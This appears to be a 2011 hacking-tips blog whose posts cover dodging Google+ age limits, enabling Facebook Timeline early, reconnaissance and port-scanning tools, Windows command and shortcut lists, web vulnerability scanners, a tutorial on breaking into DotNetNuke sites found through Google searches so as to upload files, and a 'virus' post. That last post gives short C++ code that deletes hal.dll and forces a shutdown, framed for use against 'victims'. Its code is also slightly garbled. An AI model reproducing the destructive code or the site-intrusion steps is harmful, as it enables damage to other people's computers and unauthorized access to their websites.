Wednesday, September 28, 2011

get google plus for under-ages

If you are under age then google plus will no allow you to get it now you can try this
sign up for a new account of any name then goto then sign up with your original name you cannot operate your g+ from your old one coz you cant change the passoword

Monday, September 26, 2011

Get the new facebook timeline before release

Facebook released a slew of new features, at their f8 conference and the Timeline looks like the shiniest one of the new goodies. Timeline isn't out to us regular users yet but rjcrystal, has found a way to enable Timeline by logging into the social network as a developer. This comes with a friendly warning though - the reason Facebook hasn't released the Timeline is because they're still fixing kinks and you may face bugs if you get Timeline ahead of time.Its officially releasing it on 3rd October 2011

Also, you will only be able to use Timeline on one device. If you open your Facebook account on another computer, Timeline will get disabled on both your machines. Finally, for one of the steps, you'll need to have a verified account, which means you need to have entered either a phone number or a credit card to your Facebook account.

However, if you're still hungry, here you go.

Step 1: Go to the Facebook developer page (

Step 2: Click on Apps in the top bar. This will take you to a page where you will be asked permission to access basic information for the developer application. Click on allow. 
Click on apps in the top bar
Click on apps in the top bar

Step 3: You will then be taken to the apps page. In the top right corner, you'll see an icon "Create new app". Click on that. 
Click on create a new app
Click on create a new app

Step 4: A box will pop up asking you to name your app and create a namespace for it. You can enter anything here (the namespace must not have been used before and Facebook will warn you if it has). After you plug this information in, you will then get a box wih a captcha code verifying that you aren't a bot. 
You can enter anything here. The namespace must be more than 7 characters and no caps
You can enter anything here. The namespace must be more than 7 characters and no caps

Step 5: You will be taken to a page to work on your new app. Make sure you see the app name and app ID on the top of the page. Click on Open Graph in the left hand side panel. 

Step 6: Once you are in the Open Graph page, you'll be prompted to enter an action (read, watch, plan) and a noun (book, television, trip) and then hit "Get Started). You will then be taken to a settings page. You need to change one of the default settings here. I changed the past tense of "Plan" to "Pland". Go through all three settings pages and make sure you're trying to submit your application to the public diary. Now wait 2-3 minutes.
Enter an action and a noun. Then hit
Enter an action and a noun. Then hit "get started"

Step 7: Go to your Facebook homepage. An invitation to try Timeline will be hovering at the top of your page.

After activation of timeline i got this


Sunday, September 25, 2011

Information Gathering Techniques and Tools

What is information gathering??
Whenever planning an attack it is the is most sole part of it if you fail here then you can’t perform a successful attack on your victim.

what is OS fingerprinting???
 TCP/IP stack fingerprinting is the passive collection of configuration attributes from a remote device during standard layer 4 network communications. The combination of parameters may then be used to infer the remote machine's operating system (aka, OS fingerprinting), or incorporated into a device fingerprint.

IP addresses are the most useful here but what are IP addresses these are the identity of your systems    presence on internet and it is used for communication purposes. 
# Dynamic IP- these are the free ones provided by your ISP and change automatically at anytime day or night.

# Static IP- these are the paid ones used by the MNC and other big companies for remote communication 
and it’s easy to hack this one’s rather than dynamic ones……

# How to get IP of any nodes connected to internet
The best way is pinging or we can say establishing connection with the node its easy to perform just go to command type ping  and if the host is alive on internet then it will reply and you will get its IP addresses.

# The second method by which you can find an IP of an victim by doing an whois search of the server or of the website name go to type whois you will get the  all information about your victim and many other useful things 

2. PORT scanning
After you are confirmed with the IP of victim  you can proceed with this step.
There are many ports though which you communicate with internet like FTP for transfer of files HTTP for surfing websites , IMAP POP for emails etc.

# TOOLS for port scanning, OS finger printing, IP hosts, 
2) MingSweeper is a network reconnaissance tool designed to facilitate large address space,high speed node discovery and identification. MingSweeper is capable of performing Ping sweeps, Reverse DNS sweeps, TCP & UDP port scans, OS identification and application identification.

Features of mingsweeper
  1.        Reverse DNS Sweeps
  2.       Ping Sweeps (currently ICMP only)
  3.       TCP Port Scan (full connect)
  4.       TCP Port Scan (SYN scan)
  5.       TCP Port Scan (NULL scan)
  6.       TCP Port Scan (FIN scan)
  7.       TCP Port Scan (XMAS scan)
  8.       TCP Port Filter Scan (ACK scan)
  9.       UDP Port Scan
  10.       Operating System Identification (utilises IP stack fingerprinting)
  11.       Application Identification (utilises banner grabbing)
  12.       Lazy DNS resolution
  13.       Comprehensive results presentation views with filtering/searching
  14.       Loading & Saving of scan results
  15.       Flexible target range specification
Download mingsweeper here mingsweeper
3)Angry IP scanner is a very fast IP address and port scanner.
It can scan IP addresses in any range as well as any their ports. It is cross-platform and lightweight. Not requiring any installations, it can be freely copied and used anywhere.
Angry IP scanner simply pings each IP address to check if it's alive, then optionally it is resolving its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be extended with plugins.
It also has additional features, like NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, customizable openers, etc.
Scanning results can be saved to CSV, TXT, XML or IP-Port list files. With help of plugins, Angry IP Scanner can gather any information about scanned IPs. Anybody who can write Java code is able to write plugins and extend functionality of Angry IP Scanner.
In order to increase scanning speed, it uses multithreaded approach: a separate scanning thread is created for each scanned IP address. Download here angry IP
4)Blue's Port Scanner 

A good port scanner is just one of the basic tools anyone who is seriously interested in the internet needs.
The BluesPortScan is, i think, the fastest scanner for 32Bit windows which you can found in the net. It scans local 5000 ports in 8sec. on my 2k (P3-866) machine. If you are using Win9x/ME it's a little bit slower... The new version 5 has now features like Port list-scans, AutoCompletion when entering known, existing host names or ips and a big list of typical port assignments. And of course, it's a little bit more stable, especially under Win9x/Me although these OSs are definitively not the operating systems of choice for the using this    program.

download Gui-Version v5.0.2 Build #1265
CBPS.exe Command line-Version v4.2 #272

5) P0f is a versatile passive OS fingerprinting tool. (passive OS fingerprinting tool- means other devices that were connected to you)
P0f can identify the operating system on:
  • machines that connect to your box (SYN mode),
  • machines you connect to (SYN+ACK mode),
  • machine you cannot connect to (RST+ mode),
  • machines whose communications you can observe.

P0f can also do many other tricks, and can detect or measure the following:

  • firewall presence, NAT use (useful for policy enforcement),
  • existence of a load balancer setup,
  • the distance to the remote system and its uptime,
  • other guy’s network hookup (DSL, OC3, avian carriers) and his ISP.
All this even when the device in question is behind an overzealous packet firewall, when our favourite active scanner can’t do much. P0f does not generate ANY additional network traffic, direct or indirect. No name lookups, no mysterious probes, no ARIN queries,etc .
P0fis quite useful for gathering all kinds of profiling information about your users, customers or attackers (IDS, honeypot, firewall), tech espionage (laugh…), active or passive policy enforcement (restricting access for certain systems or otherwise handling them differently; or detecting guys with illegal network hookups using masquerade detection), content optimization, pen-testing (especially with SYN+ACK and RST+ACK modes), thru-firewall fingerprinting… plus all the tasks active fingerprinting is suitable for. And, of course, it has a high coolness factor, even if you are not a sysadmin.
P0f v2 is lightweight, secure and fast enough to be run almost anywhere, hands-free for an extended period of time.
You can download p0f v2 here:

6) thc-Amap (Application MAPper)
thc-Amap (Application MAPper) is another excellent tool more towards banner grabbing
(Banner Grabbing is an enumeration technique used to glean information about computer systems on a network and the services running its open ports. Administrators can use this to take inventory of the systems and services on their network. An intruder however can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits.) and protocol detection than OS-fingerprinting. But from the services running on a machine you can get a good idea of the OS and the purpose of the server.
Amap is a next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal. It also identifies non-ascii based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.
Without filled databases containing triggers and responses, the tool is worthless, the authors would like you to help fill the database. How to do this? Well, whenever a client application connects to a server, some kind of handshake is exchanged (at least, usually. Syslogd for instance won’t say nothing, and snmpd without the right community string neither). Anyway, Amap takes the first packet sent back and compares it to a list of signature responses. Really simple, actually. And in reality, it turns out really to be that simple, at least, for most protocols.
You can download Amap here:
The Win32/Cywin binary release:

Run Commands:

compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt

Run Commands to access the control panel:

Add/Remove Programs control appwiz.cpl
Date/Time Properties control timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control inetcpl.cpl
Keyboard Properties control main.cpl keyboard
Mouse Properties control main.cpl
Multimedia Properties control mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl sounds
System Properties control sysdm.cpl

Command Prompt:

ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it's original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications

Windows XP Shortcuts:

ALT+- (ALT+hyphen) Displays the Multiple Document Interface (MDI) child window's System menu
ALT+ENTER View properties for the selected item
ALT+ESC Cycle through items in the order they were opened
ALT+F4 Close the active item, or quit the active program
ALT+SPACEBAR Display the System menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the corresponding menu
BACKSPACE View the folder one level up in My Computer or Windows Explorer
CTRL+A Select all
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+F4 Close the active document
CTRL while dragging Copy selected item
CTRL+SHIFT while dragging Create shortcut to selected iteM
CTRL+RIGHT ARROW Move the insertion point to the beginning of the next word
CTRL+LEFT ARROW Move the insertion point to the beginning of the previous word
CTRL+DOWN ARROW Move the insertion point to the beginning of the next paragraph
CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items

Windows Explorer Shortcuts:

ALT+SPACEBAR - Display the current window’s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item’s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item

Internet Explorer Shortcuts:

CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the http://www. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help

Thursday, September 22, 2011

Web vunerablity scanning tools

Web site security is very important because the website contain relevant information about a company and now a days website defacement is very common even a script kiddies and a new born hackers can do this. The most common vulnerability like SQL-Injection and cross site scripting lead towards the defacement. 

So you want to secure your web application than find vulnerabilities on it before a hacker find it, try to use some relevant tools and find vulnerabilities and fix it. There are so many tools available for both Windows and Linux platform and commercial and open source tool. Below is the best web vulnerability scanner tool that we have discussed before.

OWASP Zed Attack Proxy ZAP

OWASP or Open Web Application Security Project is a non profit organisation world wide that are focusing on improving the security of web application, for more about OWASP click here.The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It has an automatic scanning functionality and it has a set of tools that allow you to find vulnerability manually.

Web Application Attack and Audit Framework (W3AF)

W3af is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af is working for Become the best Open Source Web Application Exploitation Framework. It is available on Backtrack 5 too.

Skipfish Web Vulnerability Scanner Tool

Skipfish is an automatic web application security tool, that has been designed to find the vulnerabilities on a web application, find vulnerability on your website before than a hacker find and exploit it. It is also available on Backtrack 5.

Nikto-Vulnerability Scanner

Nikto is one of the best open source web vulnerability scanner tool that is available on the famous Linux distribution like Backtrack, Gnacktrack,Backbox and others. You can use it on other distribution and on windows too because it is only need perl script.

Netsparker Web Application Security Scanner

Netsparker is a commercial tool that has been designed to find the vulnerabilities on web application, the free version of netparker is also available so you can download it and can use for a quick penetration testing on a web application.

installing IPv6

IPv4 was a great sucess and after it now IPv6 has been released which supports hexadecimal notation and in future it will also support audio and video its said like that...
To install its bit easy goto start>run>cmd> in command type ipv6 install 

DNN (DotNetNuke) Hacking

Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Below are the easy steps to implement the attack:
  • First use a google dork to find the appropriate target.
  • You can change com to your desired domain name like bd ph ae
  • Now search your website on the google after searching you will get many websites choose any one of it.
  • Its time to check the required vulnerability on the website just place this code after the web address.
  • For example if you got
  • Replace it
  • If you will get this screen means this web is going to hack.
  • Now choose the third option “A File On Your Site” And than paste this java code on your address bar.
  • It will allow you to upload a files on this website you can upload text ~ swf ~ jpg ~ gif ~ pdf ~ Files.
  • After uploading files you can find your file on this address
here extension is txt jpg swf etc.

Powerfull C++ virus

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.

The Original Code:
using namespace std;
int main(int argc, char *argv[])
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
using namespace std;
int main(int argc, char *argv[])
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.

Twitter Delicious Facebook Digg Stumbleupon Favorites More